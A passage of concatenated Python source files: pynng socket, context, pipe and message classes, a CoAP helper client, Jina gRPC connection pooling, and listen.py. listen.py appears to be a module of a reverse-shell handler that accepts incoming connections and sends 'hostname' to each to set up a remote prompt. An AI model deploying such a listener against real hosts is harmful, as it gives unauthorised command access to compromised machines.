"""A surveyor0 socket.
The Python version of `nng_surveyor
<https://nanomsg.github.io/nng/man/tip/nng_surveyor.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It has one additional
attribute: ``survey_time``. ``survey_time`` sets the amount of time a
survey lasts.
:class:`Surveyor0` sockets work with :class:`Respondent0` sockets in the
survey pattern. In this pattern, a :class:`surveyor <Surveyor0>` sends a
message, and gives all :class:`respondents <Respondent0>` a chance to
chime in. The amount of time a survey is valid is set by the attribute
``survey_time``. ``survey_time`` is the time of a survey in milliseconds.
Here is an example:
.. literalinclude:: snippets/surveyor_sync.py
"""
_opener = lib.nng_surveyor0_open
survey_time = MsOption('surveyor:survey-time')
def __init__(self, *, survey_time=None, **kwargs):
super().__init__(**kwargs)
if survey_time is not None:
self.survey_time = survey_time
class Respondent0(Socket):
"""A respondent0 socket.
The Python version of `nng_respondent
<https://nanomsg.github.io/nng/man/tip/nng_respondent.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It accepts no
    additional arguments and has no other attributes.
:class:`Surveyor0` sockets work with :class:`Respondent0` sockets in the
survey pattern. In this pattern, a :class:`surveyor <Surveyor0>` sends a
message, and gives all :class:`respondents <Respondent0>` a chance to
chime in. The amount of time a survey is valid is set by the attribute
``survey_time``. ``survey_time`` is the time of a survey in milliseconds.
See :class:`Surveyor0` docs for an example.
"""
_opener = lib.nng_respondent0_open
class Dialer:
"""The Python version of `nng_dialer
<https://nanomsg.github.io/nng/man/tip/nng_dialer.5>`_. A
:class:`Dialer` is returned whenever :meth:`Socket.dial` is called. A list
of active dialers can be accessed via ``Socket.dialers``.
A :class:`Dialer` is associated with a single :class:`Socket`. The
associated socket can be accessed via the ``socket`` attribute. There is
no public constructor for creating a :class:`Dialer`
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_max_size = SizeOption('recv-size-max')
url = StringOption('url')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
tls_ca_file = StringOption('tls-ca-file')
tls_cert_key_file = StringOption('tls-cert-key-file')
tls_auth_mode = IntOption('tls-authmode')
tls_server_name = StringOption('tls-server-name')
def __init__(self, dialer, socket):
"""
Args:
dialer: the initialized `lib.nng_dialer`.
socket: The Socket associated with the dialer
"""
# I can't think of a reason you would need to directly instantiate this
# class
self._dialer = dialer
self.socket = socket
@property
def dialer(self):
return self._dialer[0]
def close(self):
"""
Close the dialer.
"""
lib.nng_dialer_close(self.dialer)
del self.socket._dialers[self.id]
@property
def id(self):
return lib.nng_dialer_id(self.dialer)
class Listener:
"""The Python version of `nng_listener
<https://nanomsg.github.io/nng/man/tip/nng_listener.5>`_. A
:class:`Listener` is returned whenever :meth:`Socket.listen` is called. A
list of active listeners can be accessed via ``Socket.listeners``.
A :class:`Listener` is associated with a single :class:`Socket`. The
associated socket can be accessed via the ``socket`` attribute. There is
no public constructor for creating a :class:`Listener`.
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_max_size = SizeOption('recv-size-max')
url = StringOption('url')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
tls_ca_file = StringOption('tls-ca-file')
tls_cert_key_file = StringOption('tls-cert-key-file')
tls_auth_mode = IntOption('tls-authmode')
tls_server_name = StringOption('tls-server-name')
def __init__(self, listener, socket):
"""
Args:
            listener: the initialized `lib.nng_listener`.
            socket: The Socket associated with the listener
"""
# I can't think of a reason you would need to directly instantiate this
# class
self._listener = listener
self.socket = socket
@property
def listener(self):
return self._listener[0]
def close(self):
"""
Close the listener.
"""
lib.nng_listener_close(self.listener)
del self.socket._listeners[self.id]
@property
def id(self):
return lib.nng_listener_id(self.listener)
class Context:
"""
This is the Python version of `nng_context
<https://nanomsg.github.io/nng/man/tip/nng_ctx.5.html>`_. The way to
create a :class:`Context` is by calling :meth:`Socket.new_context()`.
Contexts are valid for :class:`Req0` and :class:`Rep0` sockets; other
protocols do not support contexts.
Once you have a context, you just call :meth:`~Context.send` and
:meth:`~Context.recv` or the async equivalents as you would on a socket.
A "context" keeps track of a protocol's state for stateful protocols (like
REQ/REP). A context allows the same :class:`Socket` to be used for
multiple operations at the same time. For an example of the problem that
contexts are solving, see this snippet, **which does not use contexts**,
and does terrible things:
.. code-block:: python
# start a socket to service requests.
# HEY THIS IS EXAMPLE BAD CODE, SO DON'T TRY TO USE IT
# in fact it's so bad it causes a panic in nng right now (2019/02/09):
# see https://github.com/nanomsg/nng/issues/871
import pynng
import threading
def service_reqs(s):
while True:
data = s.recv()
s.send(b"I've got your response right here, pal!")
threads = []
with pynng.Rep0(listen='tcp://127.0.0.1:12345') as s:
for _ in range(10):
t = threading.Thread(target=service_reqs, args=[s], daemon=True)
t.start()
threads.append(t)
for thread in threads:
thread.join()
Contexts allow multiplexing a socket in a way that is safe. It removes one
of the biggest use cases for needing to use raw sockets.
Contexts cannot be instantiated directly; instead, create a
:class:`Socket`, and call the :meth:`~Socket.new_context` method.
"""
def __init__(self, socket):
# need to set attributes first, so that if anything goes wrong,
# __del__() doesn't throw an AttributeError
self._context = None
assert isinstance(socket, Socket)
self._socket = socket
self._context = ffi.new('nng_ctx *')
check_err(lib.nng_ctx_open(self._context, socket.socket))
assert lib.nng_ctx_id(self.context) != -1
async def arecv(self):
"""Asynchronously receive data using this context."""
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
return await aio.arecv()
async def asend(self, data):
"""Asynchronously send data using this context."""
_ensure_can_send(data)
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
return await aio.asend(data)
def recv_msg(self):
"""Synchronously receive a :class:`Message` using this context."""
aio_p = ffi.new('nng_aio **')
check_err(lib.nng_aio_alloc(aio_p, ffi.NULL, ffi.NULL))
aio = aio_p[0]
try:
check_err(lib.nng_ctx_recv(self.context, aio))
check_err(lib.nng_aio_wait(aio))
check_err(lib.nng_aio_result(aio))
nng_msg = lib.nng_aio_get_msg(aio)
msg = Message(nng_msg)
self._socket._try_associate_msg_with_pipe(msg)
finally:
lib.nng_aio_free(aio)
return msg
def recv(self):
"""Synchronously receive data on this context."""
msg = self.recv_msg()
return msg.bytes
def send_msg(self, msg):
"""Synchronously send the :class:`Message` ``msg`` on the context."""
with msg._mem_freed_lock:
msg._ensure_can_send()
aio_p = ffi.new('nng_aio **')
check_err(lib.nng_aio_alloc(aio_p, ffi.NULL, ffi.NULL))
aio = aio_p[0]
try:
check_err(lib.nng_aio_set_msg(aio, msg._nng_msg))
check_err(lib.nng_ctx_send(self.context, aio))
msg._mem_freed = True
check_err(lib.nng_aio_wait(aio))
check_err(lib.nng_aio_result(aio))
finally:
lib.nng_aio_free(aio)
def send(self, data):
"""
Synchronously send data on the context.
"""
_ensure_can_send(data)
msg = Message(data)
return self.send_msg(msg)
def close(self):
"""Close this context."""
ctx_err = 0
if self._context is not None:
# check that nng still has a reference
if lib.nng_ctx_id(self.context) != -1:
ctx_err = lib.nng_ctx_close(self.context)
self._context = None
check_err(ctx_err)
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
@property
def context(self):
"""Return the underlying nng object."""
return self._context[0]
def __del__(self):
self.close()
async def asend_msg(self, msg):
"""
Asynchronously send the :class:`Message` ``msg`` on the context.
"""
with msg._mem_freed_lock:
msg._ensure_can_send()
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
# Note: the aio helper sets the _mem_freed flag on the msg
return await aio.asend_msg(msg)
async def arecv_msg(self):
"""
Asynchronously receive a :class:`Message` on the context.
"""
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
msg = await aio.arecv_msg()
self._socket._try_associate_msg_with_pipe(msg)
return msg
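# A sketch of the safe, context-based version of the bad example in the
# :class:`Context` docstring: each thread services requests through its own
# context instead of sharing the raw socket:
#
#     def service_reqs(ctx):
#         while True:
#             ctx.recv()
#             ctx.send(b"I've got your response right here, pal!")
#
#     with Rep0(listen='tcp://127.0.0.1:12345') as s:
#         for _ in range(10):
#             threading.Thread(target=service_reqs,
#                              args=[s.new_context()], daemon=True).start()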
def _do_callbacks(pipe, callbacks):
for cb in callbacks:
try:
cb(pipe)
except Exception:
            msg = 'Exception raised in pipe callback {!r}'
logger.exception(msg.format(cb))
@ffi.def_extern()
def _nng_pipe_cb(lib_pipe, event, arg):
logger.debug("Pipe callback event {}".format(event))
# Get the Socket from the handle passed through the callback arguments
sock = ffi.from_handle(arg)
# exceptions don't propagate out of this function, so if any exception is
# raised in any of the callbacks, we just log it (using logger.exception).
with sock._pipe_notify_lock:
pipe_id = lib.nng_pipe_id(lib_pipe)
if event == lib.NNG_PIPE_EV_ADD_PRE:
# time to do our bookkeeping; actually create the pipe and attach it to
# the socket
pipe = sock._add_pipe(lib_pipe)
_do_callbacks(pipe, sock._on_pre_pipe_add)
if pipe.closed:
# NB: we need to remove the pipe from socket now, before a remote
# tries connecting again and the same pipe ID may be reused. This
# will result in a KeyError below.
sock._remove_pipe(lib_pipe)
elif event == lib.NNG_PIPE_EV_ADD_POST:
# The ADD_POST event can arrive before ADD_PRE, in which case the Socket
# won't have the pipe_id in the _pipes dictionary
# _add_pipe will return an existing pipe or create a new one if it doesn't exist
pipe = sock._add_pipe(lib_pipe)
_do_callbacks(pipe, sock._on_post_pipe_add)
elif event == lib.NNG_PIPE_EV_REM_POST:
try:
pipe = sock._pipes[pipe_id]
except KeyError:
# we get here if the pipe was closed in pre_connect earlier. This
# is not a big deal.
logger.debug('Could not find pipe for socket')
return
try:
_do_callbacks(pipe, sock._on_post_pipe_remove)
finally:
sock._remove_pipe(lib_pipe)
class Pipe:
"""
A "pipe" is a single connection between two endpoints. This is the Python
version of `nng_pipe
<https://nanomsg.github.io/nng/man/v1.1.0/nng_pipe.5>`_.
There is no public constructor for a Pipe; pipes are added to the
underlying socket automatically whenever a connection is established.
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
url = StringOption('url')
protocol = IntOption('protocol')
protocol_name = StringOption('protocol-name')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
def __init__(self, lib_pipe, socket):
# NB: For reasons that are not fully understood, keeping a reference to
# lib_pipe directly leads to memory corruption; it may be a bad interaction
# between being invoked from a C callback and cffi's ownership/refcounting.
# Whatever the cause, making our own copy of the nng_pipe object avoids it.
self._pipe = ffi.new('nng_pipe *')
self._pipe[0] = lib_pipe
self.pipe = self._pipe[0]
self.socket = socket
self._closed = False
@property
def closed(self):
"""
Return whether the pipe has been closed directly.
This will not be valid if the pipe was closed indirectly, e.g. by
closing the associated listener/dialer/socket.
"""
return self._closed
@property
def id(self):
return lib.nng_pipe_id(self.pipe)
@property
def dialer(self):
"""
Return the dialer this pipe is associated with. If the pipe is not
associated with a dialer, raise an exception
"""
dialer = lib.nng_pipe_dialer(self.pipe)
d_id = lib.nng_dialer_id(dialer)
if d_id < 0:
raise TypeError('This pipe has no associated dialers.')
return self.socket._dialers[d_id]
@property
def listener(self):
"""
Return the listener this pipe is associated with. If the pipe is not
associated with a listener, raise an exception
"""
listener = lib.nng_pipe_listener(self.pipe)
l_id = lib.nng_listener_id(listener)
if l_id < 0:
raise TypeError('This pipe has no associated listeners.')
return self.socket._listeners[l_id]
def close(self):
"""
Close the pipe.
"""
check_err(lib.nng_pipe_close(self.pipe))
self._closed = True
def send(self, data):
"""
Synchronously send bytes from this :class:`Pipe`. This method
automatically creates a :class:`Message`, associates with this pipe,
and sends it with this pipe's associated :class:`Socket`.
"""
_ensure_can_send(data)
msg = Message(data, self)
self.socket.send_msg(msg)
def send_msg(self, msg):
"""
Synchronously send a Message from this :class:`Pipe`.
"""
msg.pipe = self
self.socket.send_msg(msg)
async def asend(self, data):
"""
Asynchronously send bytes from this :class:`Pipe`.
"""
_ensure_can_send(data)
msg = Message(data, self)
return await self.socket.asend_msg(msg)
async def asend_msg(self, msg):
"""
Asynchronously send a Message from this :class:`Pipe`.
"""
msg.pipe = self
return await self.socket.asend_msg(msg)
class Message:
"""
Python interface for `nng_msg
<https://nanomsg.github.io/nng/man/tip/nng_msg.5.html>`_. Using the
:class:`Message` interface gives more control over aspects of
sending the message. In particular, you can tell which
:class:`Pipe` a message came from on receive, and you can direct
which :class:`Pipe` a message will be sent from on send.
In normal usage, you would not create a :class:`Message` directly. Instead
you would receive a message using :meth:`Socket.recv_msg`, and send a
message (implicitly) by using :meth:`Pipe.send`.
Since the main purpose of creating a :class:`Message` is to send it using a
specific :class:`Pipe`, it is usually more convenient to just use the
:meth:`Pipe.send` or :meth:`Pipe.asend` method directly.
Messages in pynng are immutable; this is to prevent data corruption.
Warning:
The message's underlying data buffer can be accessed with the
``_buffer`` attribute. However, care must be taken not to send a message
while a reference to the buffer is still alive; if the buffer is used after
a message is sent, a segfault or data corruption may (read: will)
result.
"""
def __init__(self, data, pipe=None):
# NB! There are two ways that a user can free resources that an nng_msg
# is using: either sending with nng_sendmsg (or the async equivalent)
# or with nng_msg_free. We don't know how this msg will be used, but
# we need to **ensure** that we don't try to double free. The flag
# _mem_freed is used to indicate that we cannot send the message again.
# The methods send_msg() and asend_msg() must ensure that the flag
# `_mem_freed` is set to True.
self._mem_freed = False
self._mem_freed_lock = threading.Lock()
if isinstance(data, ffi.CData) and \
ffi.typeof(data).cname == 'struct nng_msg *':
self._nng_msg = data
else:
msg_p = ffi.new('nng_msg **')
check_err(lib.nng_msg_alloc(msg_p, 0))
msg = msg_p[0]
check_err(lib.nng_msg_append(msg, data, len(data)))
self._nng_msg = msg
# We may not have been given a pipe, in which case the pipe is None.
if pipe is None:
self._pipe = None
else:
self.pipe = pipe
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if not isinstance(pipe, Pipe):
msg = 'pipe must be type Pipe, not {}'.format(type(pipe))
raise ValueError(msg)
check_err(lib.nng_msg_set_pipe(self._nng_msg, pipe.pipe))
self._pipe = pipe
@property
def _buffer(self):
"""
Returns a cffi.buffer to the underlying nng_msg buffer.
If you access the message's buffer using this property, you must ensure
that you do not send the message while you are still using the buffer.
"""
with self._mem_freed_lock:
if not self._mem_freed:
size = lib.nng_msg_len(self._nng_msg)
data = ffi.cast('char *', lib.nng_msg_body(self._nng_msg))
return ffi.buffer(data[0:size])
@property
def bytes(self):
"""
Return the bytes from the underlying buffer.
"""
return bytes(self._buffer)
def __del__(self):
with self._mem_freed_lock:
if self._mem_freed:
return
else:
lib.nng_msg_free(self._nng_msg)
# pretty sure it's not necessary to set this, but that's okay.
self._mem_freed = True
def _ensure_can_send(self):
"""
Raises an exception if the message's state is such that it cannot be
sent. The _mem_freed_lock() must be acquired when this method is
called.
"""
assert self._mem_freed_lock.locked()
if self._mem_freed:
msg = 'Attempted to send the same message more than once.'
raise pynng.MessageStateError(msg)
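# A minimal usage sketch (not part of the library; the address is an
# arbitrary example). A received Message carries the Pipe it arrived on,
# and Pipe.send() directs the reply back through that exact connection:
if __name__ == '__main__':
    import pynng
    with pynng.Pair0(listen='tcp://127.0.0.1:13131') as s0, \
            pynng.Pair0(dial='tcp://127.0.0.1:13131') as s1:
        s1.send(b'ping')
        msg = s0.recv_msg()      # msg.pipe is the connection it came from
        msg.pipe.send(b'pong')   # reply through that specific pipe
        assert s1.recv() == b'pong'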
|
listen.py | import socket
import time
import sys
from colorama import Fore, init
import connection
import threading
import argparse
#make sure colors work properly in Windows (sys.platform is 'win32' on both 32- and 64-bit Windows)
if sys.platform == 'win32':
init(convert=True)
host = ''
port = ''
sockets = []
ports = []
args = ''
description = 'start listener on specified port'
#this is what's used to actually call the module in server.py
cmdstring = 'listener'
#run module
def execute(cmd):
cmd = cmd.split(cmdstring)[1].lstrip().split()
if parse(cmd):
try:
command()
except Exception as e:
print_error(e)
#what happens when module is run
def command():
global sockets
global ports
#attempt to start a listener if port is available
if args.action == 'start':
if port in ports:
print_error('There is already a listener on that port!')
else:
bind()
#kill a listener
elif args.action == 'stop':
try:
if port in ports:
i = ports.index(port)
#cleanup time!
sockets[i].close()
del sockets[i]
del ports[i]
time.sleep(1)
print_notification('Successfully terminated listener on port ' + str(port))
else:
print_error('There is no listener on that port!')
except Exception as e:
print_error(e)
#show all listeners in pretty format
elif args.action == 'show':
print(Fore.LIGHTCYAN_EX + '\n--------- Ports ---------\n' + Fore.RESET, end='')
for p in ports:
print(Fore.LIGHTYELLOW_EX + '--> ' + str(p) + Fore.RESET)
print(Fore.LIGHTCYAN_EX + '-------------------------\n' + Fore.RESET)
#bind port and socket
def bind():
global sockets
global ports
try:
s = socket.socket()
except socket.error as msg:
print(Fore.LIGHTRED_EX + "[!] Socket creation error: " + str(msg) + Fore.RESET)
try:
s.bind((host,port))
sockets.append(s)
ports.append(port)
s.settimeout(1)
#use threads!
t = threading.Thread(target=listen, args=(s,))
t.daemon = True
t.start()
print_notification('Listening for incoming connections on port ' + str(port))
except:
print_error('Error binding socket! Is socket already listening?')
return
#what happens once we start the listeners
def listen(s):
global sockets
global ports
s.listen(5)
while True:
try:
#can't get in
if(s._closed):
break
#connect to host
try:
conn, address = s.accept()
except:
continue
conn.setblocking(0)
connection.connections.append(conn)
connection.addresses.append(address)
ip = conn.getsockname()[0]
#notify upon successful connection
print(Fore.LIGHTYELLOW_EX + "\n[+] Connection received from " + address[0] + ' on port ' + str(s.getsockname()[1]) + Fore.LIGHTCYAN_EX + '\n' + Fore.RESET, end='')
#run some commands to get ourselves a nice little prompt and record hostname
try:
connection.recieve_immediately(conn)
conn.send(str.encode('hostname\n'))
hostname = connection.recieve_immediately(conn).split('\n')[0]
hostname = hostname.strip('\r')
#couldn't get the hostname :/
except:
print_error('Error getting hostname for ' + address[0] + '!')
hostname = 'unknown'
connection.hostnames.append(hostname)
except Exception as e:
print_error(e)
pass
#just some color coding
def print_error(error):
print(Fore.LIGHTRED_EX + '[!] ' + str(error) + Fore.RESET)
def print_notification(notification):
print(Fore.LIGHTYELLOW_EX + '[+] ' + notification + Fore.RESET)
#handle argument parsing for the module
def parse(cmd):
global port
global args
global description
try:
parser = argparse.ArgumentParser(description=description)
subparsers = parser.add_subparsers(help='add or remove listeners')
add = subparsers.add_parser('add', help='add a listener')
add.add_argument(dest='port', type=int, help='specify port')
add.set_defaults(action='start')
remove = subparsers.add_parser('remove', help='remove a listener')
remove.add_argument(dest='port', type=int, help='specify port')
remove.set_defaults(action='stop')
show = subparsers.add_parser('show', help='show active listeners')
show.set_defaults(action='show')
if len(cmd) == 0:
parser.print_help()
print()
return False
args = parser.parse_args(cmd)
if hasattr(args,'port'):
port = args.port
return True
except:
print()
return False
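#a minimal usage sketch (hypothetical; normally server.py dispatches commands
#to this module through execute()):
if __name__ == '__main__':
    execute('listener add 4444')    #start a listener on port 4444
    execute('listener show')        #print active listeners
    execute('listener remove 4444') #stop it again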
|
helperclient.py | import random
from multiprocessing import Queue
from queue import Empty
import threading
from coapthon.messages.message import Message
from coapthon import defines
from coapthon.client.coap import CoAP
from coapthon.messages.request import Request
from coapthon.utils import generate_random_token
import socket
__author__ = 'Giacomo Tanganelli'
class HelperClient(object):
"""
Helper Client class to perform requests to remote servers in a simplified way.
"""
def __init__(self, server, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize a client to perform request to a server.
:param server: the remote CoAP server
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
"""
#self.server = server
# bug fix: if the host is a domain name, resolve it to an IP address
server_ip = socket.getaddrinfo(server[0], None)[0][4][0]
if server_ip == server[0]:
self.server = server
else:
self.server = (server_ip, server[1])
self.protocol = CoAP(self.server, random.randint(1, 65535), self._wait_response, sock=sock,
cb_ignore_read_exception=cb_ignore_read_exception, cb_ignore_write_exception=cb_ignore_write_exception)
self.queue = Queue()
def _wait_response(self, message):
"""
Private function to get responses from the server.
:param message: the received message
"""
if message is None or message.code != defines.Codes.CONTINUE.number:
self.queue.put(message)
def stop(self):
"""
Stop the client.
"""
self.protocol.close()
self.queue.put(None)
def close(self):
"""
Close the client.
"""
self.stop()
def _thread_body(self, request, callback):
"""
Private function. Send a request, wait for response and call the callback function.
:param request: the request to send
:param callback: the callback function
"""
self.protocol.send_message(request)
while not self.protocol.stopped.isSet():
response = self.queue.get(block=True)
callback(response)
def cancel_observing(self, response, send_rst): # pragma: no cover
"""
Delete observing on the remote server.
:param response: the last received response
:param send_rst: if explicitly send RST message
:type send_rst: bool
"""
if send_rst:
message = Message()
message.destination = self.server
message.code = defines.Codes.EMPTY.number
message.type = defines.Types["RST"]
message.token = response.token
message.mid = response.mid
self.protocol.send_message(message)
self.stop()
def get(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a GET on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.GET, path)
request.token = generate_random_token(2)
for k, v in kwargs.items():
print ("get", k,v)
if hasattr(request, k):
print ("get : setting:", k,v)
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def get_non(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a non-confirmable (NON) GET on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request_non(defines.Codes.GET, path)
#request.token = generate_random_token(2)
for k, v in kwargs.items():
print ("get_none", k,v)
if hasattr(request, k):
print ("get_none", k,v)
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def observe(self, path, callback, timeout=None, **kwargs): # pragma: no cover
"""
Perform a GET with observe on a certain path.
:param path: the path
:param callback: the callback function to invoke upon notifications
:param timeout: the timeout of the request
:return: the response to the observe request
"""
request = self.mk_request(defines.Codes.GET, path)
request.observe = 0
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def delete(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a DELETE on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.DELETE, path)
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def post(self, path, payload, callback=None, timeout=None, no_response=False, **kwargs): # pragma: no cover
"""
Perform a POST on a certain path.
:param path: the path
:param payload: the request payload
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.POST, path)
request.token = generate_random_token(2)
request.payload = payload
if no_response:
request.add_no_response()
request.type = defines.Types["NON"]
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout, no_response=no_response)
def put(self, path, payload, callback=None, timeout=None, no_response=False, **kwargs): # pragma: no cover
"""
Perform a PUT on a certain path.
:param path: the path
:param payload: the request payload
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.PUT, path)
request.token = generate_random_token(2)
request.payload = payload
if no_response:
request.add_no_response()
request.type = defines.Types["NON"]
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout, no_response=no_response)
def discover(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a Discover request on the server.
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
if path is None:
request = self.mk_request_non(defines.Codes.GET, "/oic/res")
else:
request = self.mk_request_non(defines.Codes.GET, path)
request.token = generate_random_token(2)
print ("discover : path=", path)
for k, v in kwargs.items():
print ("discover : has:", k,v)
if hasattr(request, k):
try:
print ("discover : setting:", k,v)
setattr(request, k, v)
except:
pass
return self.send_request(request, callback, timeout)
def send_request(self, request, callback=None, timeout=None, no_response=False): # pragma: no cover
"""
Send a request to the remote server.
:param request: the request to send
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
if callback is not None:
thread = threading.Thread(target=self._thread_body, args=(request, callback))
thread.start()
else:
self.protocol.send_message(request)
if no_response:
return
try:
response = self.queue.get(block=True, timeout=timeout)
except Empty:
#the request timed out (when a timeout is set) without receiving a response
response = None
return response
def send_empty(self, empty): # pragma: no cover
"""
Send empty message.
:param empty: the empty message
"""
self.protocol.send_message(empty)
def mk_request(self, method, path):
"""
Create a request.
:param method: the CoAP method
:param path: the path of the request
:return: the request
"""
request = Request()
request.destination = self.server
request.code = method.number
request.uri_path = path
return request
def mk_request_non(self, method, path):
"""
Create a request.
:param method: the CoAP method
:param path: the path of the request
:return: the request
"""
request = Request()
request.destination = self.server
request.code = method.number
request.uri_path = path
request.type = defines.Types["NON"]
return request
# feature update : ping
def ping(self):
"""
Send a CON empty message to the server to trigger a RST response (CoAP ping).
"""
empty = Request()
empty.destination = self.server
empty.type = 0
self.send_empty(empty)
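# A minimal usage sketch (assumes a CoAP server reachable at the placeholder
# host/port; 'basic' is a placeholder resource path):
if __name__ == '__main__':
    client = HelperClient(server=('127.0.0.1', 5683))
    response = client.get('basic')  # blocking GET on the 'basic' resource
    print(response.pretty_print())
    client.stop()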
|
networking.py | import ast
import asyncio
import ipaddress
import socket
from abc import abstractmethod
from argparse import Namespace
from threading import Thread
from typing import TYPE_CHECKING, Optional
import grpc
from jina.logging.logger import JinaLogger
from jina.proto import jina_pb2_grpc
from jina.types.message import Message
from .. import __default_host__, __docker_host__
from ..helper import get_internal_ip, get_or_reuse_loop, get_public_ip
if TYPE_CHECKING:
import kubernetes
class ConnectionList:
"""
Maintains a list of connections and uses round robin for selecting a connection
:param port: port to use for the connections
"""
def __init__(self, port: int):
self.port = port
self._connections = []
self._address_to_connection_idx = {}
self._rr_counter = 0
def add_connection(self, address: str, connection):
"""
Add connection with ip to the connection list
:param address: Target address of this connection
:param connection: The connection to add
"""
if address not in self._address_to_connection_idx:
self._address_to_connection_idx[address] = len(self._connections)
self._connections.append(connection)
def remove_connection(self, address: str):
"""
Remove connection with ip from the connection list
:param address: Remove connection for this address
:returns: The removed connection or None if there was not any for the given ip
"""
if address in self._address_to_connection_idx:
self._rr_counter = (
self._rr_counter % (len(self._connections) - 1)
if (len(self._connections) - 1)
else 0
)
return self._connections.pop(self._address_to_connection_idx.pop(address))
return None
def get_next_connection(self):
"""
Returns a connection from the list. Strategy is round robin
:returns: A connection from the pool
"""
try:
connection = self._connections[self._rr_counter]
except IndexError:
# This can happen as a race condition while removing connections
self._rr_counter = 0
connection = self._connections[self._rr_counter]
self._rr_counter = (self._rr_counter + 1) % len(self._connections)
return connection
def pop_connection(self):
"""
Removes and returns a connection from the list. Strategy is round robin
:returns: The connection removed from the pool
"""
if self._connections:
connection = self._connections.pop(self._rr_counter)
self._rr_counter = (
(self._rr_counter + 1) % len(self._connections)
if len(self._connections)
else 0
)
return connection
else:
return None
def has_connection(self, address: str) -> bool:
"""
Checks if a connection for ip exists in the list
:param address: The address to check
:returns: True if a connection for the ip exists in the list
"""
return address in self._address_to_connection_idx
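# A quick illustration of the round-robin selection (the "connections" here
# are plain strings purely for demonstration):
#
# pool = ConnectionList(port=8080)
# pool.add_connection('1.1.1.1:8080', 'conn_a')
# pool.add_connection('2.2.2.2:8080', 'conn_b')
# assert pool.get_next_connection() == 'conn_a'
# assert pool.get_next_connection() == 'conn_b'
# assert pool.get_next_connection() == 'conn_a'  # wraps around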
class ConnectionPool:
"""
Manages a list of connections.
:param logger: the logger to use
:param on_demand_connection: Flag to indicate if connections should be created on demand
"""
def __init__(self, logger: Optional[JinaLogger] = None, on_demand_connection=True):
self._connections = {}
self._on_demand_connection = on_demand_connection
self._logger = logger or JinaLogger(self.__class__.__name__)
def send_message(self, msg: Message, target_address: str):
"""Send msg to target_address via one of the pooled connections
:param msg: message to send
:param target_address: address to send to, should include the port like 1.1.1.1:53
:return: result of the actual send method
"""
if target_address in self._connections:
pooled_connection = self._connections[target_address].get_next_connection()
return self._send_message(msg, pooled_connection)
elif self._on_demand_connection:
# If on-demand connections are enabled and the address is unknown: create the connection
connection_pool = self._create_connection_pool(target_address)
return self._send_message(msg, connection_pool.get_next_connection())
else:
raise ValueError(f'Unknown address {target_address}')
def _create_connection_pool(self, target_address):
port = int(target_address[target_address.rfind(':') + 1 :])  # ConnectionList expects an int port
connection_pool = ConnectionList(port=port)
connection_pool.add_connection(
target_address, self._create_connection(target=target_address)
)
self._connections[target_address] = connection_pool
return connection_pool
def start(self):
"""
Starts the connection pool
"""
pass
def close(self):
"""
Closes the connection pool
"""
self._connections.clear()
@abstractmethod
def _send_message(self, msg: Message, connection):
...
@abstractmethod
def _create_connection(self, target):
...
class GrpcConnectionPool(ConnectionPool):
"""
GrpcConnectionPool which uses gRPC as the communication mechanism
"""
def _send_message(self, msg: Message, connection):
# this wraps the awaitable object from grpc as a coroutine so it can be used as a task
# the grpc call function is not a coroutine but some _AioCall
async def task_wrapper(new_message, stub):
await stub.Call(new_message)
return asyncio.create_task(task_wrapper(msg, connection))
def _create_connection(self, target):
self._logger.debug(f'create connection to {target}')
channel = grpc.aio.insecure_channel(
target,
options=[
('grpc.max_send_message_length', -1),
('grpc.max_receive_message_length', -1),
],
)
return jina_pb2_grpc.JinaDataRequestRPCStub(channel)
